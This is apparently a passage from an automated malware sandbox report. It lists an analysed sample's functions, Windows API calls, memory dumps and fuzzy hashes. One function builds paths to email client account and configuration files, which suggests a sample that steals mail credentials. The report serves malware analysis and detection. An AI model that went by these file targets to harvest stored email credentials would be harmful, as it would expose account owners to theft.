                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004062F3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                                                    • API String ID: 2200240437-4240819195
                                                                                                                                                                                    • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                                                                                                                                    • Instruction ID: 90c405808a5079913e9fc86ee6967ca4c100a0af48b71fe7beb271d56a4ee20c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89F0F630510609AADB15AB64DD0DFEB365CAB08304F1405BEA686F11C1EA78E9398B99
                                                                                                                                                                                    Function 00402736 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,?,00000000,00000000,?,?,?,000000F0), ref: 0040278A
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004027E5
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004027F8
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,?,00000000,00000000,?,?,?,000000F0), ref: 00402824
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                                                                    • Opcode ID: 86959158328887a69436977c2353ec4d0a2939775019437a65a2cb7982052b7f
                                                                                                                                                                                    • Instruction ID: 6644526d81fa5c7ff175c86addd85cc92bc24fd3ec06af29a2511a4f4fc8a5d3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 86959158328887a69436977c2353ec4d0a2939775019437a65a2cb7982052b7f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B21BC71800124BBDF216FA5DE89D9E7B79EF04324F10423AF924762E0CA784D418FA8
                                                                                                                                                                                    Function 367B1000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 367B1038
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 367B104B
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 367B1061
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 367B1075
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 367B1090
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 367B10B8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3594823470-0
                                                                                                                                                                                    • Opcode ID: 8cba604efcacce07f160cef315bb1353561013336751146b783b0992864888fc
                                                                                                                                                                                    • Instruction ID: e1f0efc7132ffc647a9dd882367a1b0904d60ff1393d165e1c700ffe503bed60
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cba604efcacce07f160cef315bb1353561013336751146b783b0992864888fc
                                                                                                                                                                                    • Instruction Fuzzy Hash: EF217176D1031C9BCF109A60DC4CDDF3B69EF44214F908296E95ADB1A1DB309A96CB51
                                                                                                                                                                                    Function 367B11EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 367B1E89: lstrlenW.KERNEL32(?,?,?,?,?,367B10DF,?,?,?,00000000), ref: 367B1E9A
                                                                                                                                                                                      • Part of subcall function 367B1E89: lstrcatW.KERNEL32(?,?,?,367B10DF,?,?,?,00000000), ref: 367B1EAC
                                                                                                                                                                                      • Part of subcall function 367B1E89: lstrlenW.KERNEL32(?,?,367B10DF,?,?,?,00000000), ref: 367B1EB3
                                                                                                                                                                                      • Part of subcall function 367B1E89: lstrlenW.KERNEL32(?,?,367B10DF,?,?,?,00000000), ref: 367B1EC8
                                                                                                                                                                                      • Part of subcall function 367B1E89: lstrcatW.KERNEL32(?,367B10DF,?,367B10DF,?,?,?,00000000), ref: 367B1ED3
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 367B122A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                    • API String ID: 1475205934-1520055953
                                                                                                                                                                                    • Opcode ID: ca98fc0cf40848b1e33166bba44ea85f8309591ef693855d8991650c99bdb2d6
                                                                                                                                                                                    • Instruction ID: 180884d9e0e0456d3a7d8bb04d403181d6575f004f2aca67b60d8fa10882e086
                                                                                                                                                                                    • Opcode Fuzzy Hash: ca98fc0cf40848b1e33166bba44ea85f8309591ef693855d8991650c99bdb2d6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7121C379E10208AAEB109BA0EC85FED773AEF80714F800556F605EF2D0E7B15D818B59
                                                                                                                                                                                    Function 367B4B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,367B4AEA,?,?,367B4A8A,?,367C2238,0000000C,367B4BBD,00000000,00000000), ref: 367B4B59
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 367B4B6C
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,367B4AEA,?,?,367B4A8A,?,367C2238,0000000C,367B4BBD,00000000,00000000,00000001,367B2082), ref: 367B4B8F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                    • Opcode ID: 5fa6e425b2b58cba473a8ea292674dc8b52da0a0cd9a05bca23720230457d27e
                                                                                                                                                                                    • Instruction ID: c0072ebe8da016eafb80f09b23cbc2f1288a336ccab34a2c223cff4864157180
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fa6e425b2b58cba473a8ea292674dc8b52da0a0cd9a05bca23720230457d27e
                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF03C75910108EBDF119B91C808FAEBFBAEF04351F8041A8EA05EB154DB359942CAA1
                                                                                                                                                                                    Function 367B9492 Relevance: 7.7, APIs: 5, Instructions: 152fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,367B9C07,?,00000000,?,00000000,00000000), ref: 367B94D4
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 367B9590
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,367B9C07,00000000,?,?,?,?,?,?,?,?,?,367B9C07,?), ref: 367B95AF
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,367B9C07,00000000,?,?,?,?,?,?,?,?,?,367B9C07,?), ref: 367B95E8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 977765425-0
                                                                                                                                                                                    • Opcode ID: 2f70404235a74873e5f16b0c6b78efb6dedd54e7417514d0020d1f198aa70bdc
                                                                                                                                                                                    • Instruction ID: f6a83f91da2c2c9367ed50c76796e61672e2a6f0aadd42fd2f577a22ca124e37
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f70404235a74873e5f16b0c6b78efb6dedd54e7417514d0020d1f198aa70bdc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B51A5B5D042099FDF00CFA8C895BEEBBF9EF09310F54451AE565EB281E7309941CBA1
                                                                                                                                                                                    Function 00401759 Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,00000000,0040A418,00435800,00000000,00000000,00000031), ref: 00401798
                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,0040A418,0040A418,00000000,00000000,0040A418,00435800,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                                                                      • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,0042EC00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                                                                                                                                                                                      • Part of subcall function 0040508C: lstrlenA.KERNEL32(0042A050,00000000,?,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                                                                                                                                                                                      • Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,0042A050,00000000,?,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                                                                                                                                                                                      • Part of subcall function 0040508C: lstrcatA.KERNEL32(0042A050,004030DC,004030DC,0042A050,00000000,?,761F23A0), ref: 004050E8
                                                                                                                                                                                      • Part of subcall function 0040508C: SetWindowTextA.USER32(0042A050,0042A050), ref: 004050FA
                                                                                                                                                                                      • Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                                                                                                                                                                                      • Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                                                                                                                                                                                      • Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1941528284-0
                                                                                                                                                                                    • Opcode ID: d5b44f832fdb25be28d2b543a9b61bfb24a32d76e5489e3aa463aebb2df8a026
                                                                                                                                                                                    • Instruction ID: 024705dcfdf044f05b4b82656432081f20986447a00b4521f0a60d415ab43704
                                                                                                                                                                                    • Opcode Fuzzy Hash: d5b44f832fdb25be28d2b543a9b61bfb24a32d76e5489e3aa463aebb2df8a026
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4841B431A04515BECB107BB58C45EAF3679EF05369F60833BF421F20E1D67C89428A6D
                                                                                                                                                                                    Function 00401D95 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(?), ref: 00401D98
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                                                                                                                                                    • CreateFontIndirectA.GDI32(0040B820), ref: 00401E1A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3808545654-0
                                                                                                                                                                                    • Opcode ID: 308e053560ee70820e3614aee6e3ae82a2990e303a595f115dffdce8e5cbd147
                                                                                                                                                                                    • Instruction ID: e9269c0f41cd5a79e17a17131fa0488204b4df503fc5c3e11bd14e9e74a55962
                                                                                                                                                                                    • Opcode Fuzzy Hash: 308e053560ee70820e3614aee6e3ae82a2990e303a595f115dffdce8e5cbd147
                                                                                                                                                                                    • Instruction Fuzzy Hash: 24014072944344AEE7006BB4AE49BA97FE8EB15705F109439F141B61F2CB790405CF6D
                                                                                                                                                                                    Function 367B1E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,367B10DF,?,?,?,00000000), ref: 367B1E9A
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,367B10DF,?,?,?,00000000), ref: 367B1EAC
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,367B10DF,?,?,?,00000000), ref: 367B1EB3
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,367B10DF,?,?,?,00000000), ref: 367B1EC8
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,367B10DF,?,367B10DF,?,?,?,00000000), ref: 367B1ED3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$lstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 493641738-0
                                                                                                                                                                                    • Opcode ID: 23372c8776dc9531ab3f6293fd3e514858b780365402f38207b7c2b2ab7f912d
                                                                                                                                                                                    • Instruction ID: c2fd49f64b19f179a7bdf57f51b6bbe1057d9da3e988a5ae2fa78ff21beecb92
                                                                                                                                                                                    • Opcode Fuzzy Hash: 23372c8776dc9531ab3f6293fd3e514858b780365402f38207b7c2b2ab7f912d
                                                                                                                                                                                    • Instruction Fuzzy Hash: DBF08226511214BAD721272AAC85EBF7B7DEFC6B61F840019FA08D7190DB54584392B6
                                                                                                                                                                                    Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?), ref: 00401D3F
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                                                                                                                                                    • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D8A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                                                    • Opcode ID: f9fa1cd0c3501304c50b62854bfb403a78d5a342419f16e3e75aa469d0047489
                                                                                                                                                                                    • Instruction ID: b94dd0b2fc2efe961c915ac3dbaedcbaa59703da1128c811c259d0727350af9e
                                                                                                                                                                                    • Opcode Fuzzy Hash: f9fa1cd0c3501304c50b62854bfb403a78d5a342419f16e3e75aa469d0047489
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EF0FFB2600515BFDB00EBA4DE88DAFB7BCEB44301B04447AF645F2191CA748D018B38
                                                                                                                                                                                    Function 0040484D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,?), ref: 004048EB
                                                                                                                                                                                    • wsprintfA.USER32 ref: 004048F3
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,0042A870), ref: 00404906
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                                                                    • Opcode ID: fc360b60deb29158253d5225dc841659dab03716f0da90b14001ba2338fc6a71
                                                                                                                                                                                    • Instruction ID: 46e1028d5dd9cf3fa3a12b124fa319e283dc00677a7b855ac62dacd231200cde
                                                                                                                                                                                    • Opcode Fuzzy Hash: fc360b60deb29158253d5225dc841659dab03716f0da90b14001ba2338fc6a71
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D11E477A041282BEB0075699C41EBF3298DB82374F24463BFE65F21D1E979CC1246E9
                                                                                                                                                                                    Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                                                    • Opcode ID: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
                                                                                                                                                                                    • Instruction ID: bdc01a124477b6dd133b62af0939e03034df0dda3ad70936a50ebcebbcd9d6cc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F218F71A44209BEEB15DFA5D946AED7BB0EB84304F14803EF505F61D1DA7889408F28
                                                                                                                                                                                    Function 367B15DA Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,367B190E,?,?,00000000,?,00000000), ref: 367B1643
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,367B190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 367B165A
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,367B190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 367B1661
                                                                                                                                                                                    • lstrcatW.KERNEL32(00001008,?,?,?,?,?,367B190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 367B1686
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrcatlstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1475610065-0
                                                                                                                                                                                    • Opcode ID: 3ffad3cae6ca35135864fe4548f91e07f4660612597d3756c91e7e65806743d7
                                                                                                                                                                                    • Instruction ID: dea87ffdfc5aaefc3292d8e67e0b9356d1e9eb994af2615ef02bf4262ab39cd9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ffad3cae6ca35135864fe4548f91e07f4660612597d3756c91e7e65806743d7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0821C836900204ABDB05DF54DC84EFE7BB9EF88710F64446AE604EF145EF34A54287B6
                                                                                                                                                                                    Function 00401FFD Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00402028
                                                                                                                                                                                      • Part of subcall function 0040508C: lstrlenA.KERNEL32(0042A050,00000000,?,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                                                                                                                                                                                      • Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,0042A050,00000000,?,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                                                                                                                                                                                      • Part of subcall function 0040508C: lstrcatA.KERNEL32(0042A050,004030DC,004030DC,0042A050,00000000,?,761F23A0), ref: 004050E8
                                                                                                                                                                                      • Part of subcall function 0040508C: SetWindowTextA.USER32(0042A050,0042A050), ref: 004050FA
                                                                                                                                                                                      • Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                                                                                                                                                                                      • Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                                                                                                                                                                                      • Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402038
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00402048
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2987980305-0
                                                                                                                                                                                    • Opcode ID: 6502492516440c40321f6c440113f9ce282d7bb2c3c872fdf5e33247a2bec000
                                                                                                                                                                                    • Instruction ID: 3b54ba627a5d3606a08c88bc2c88048367fe0e0edc5ddf34d35ff9eabd327fef
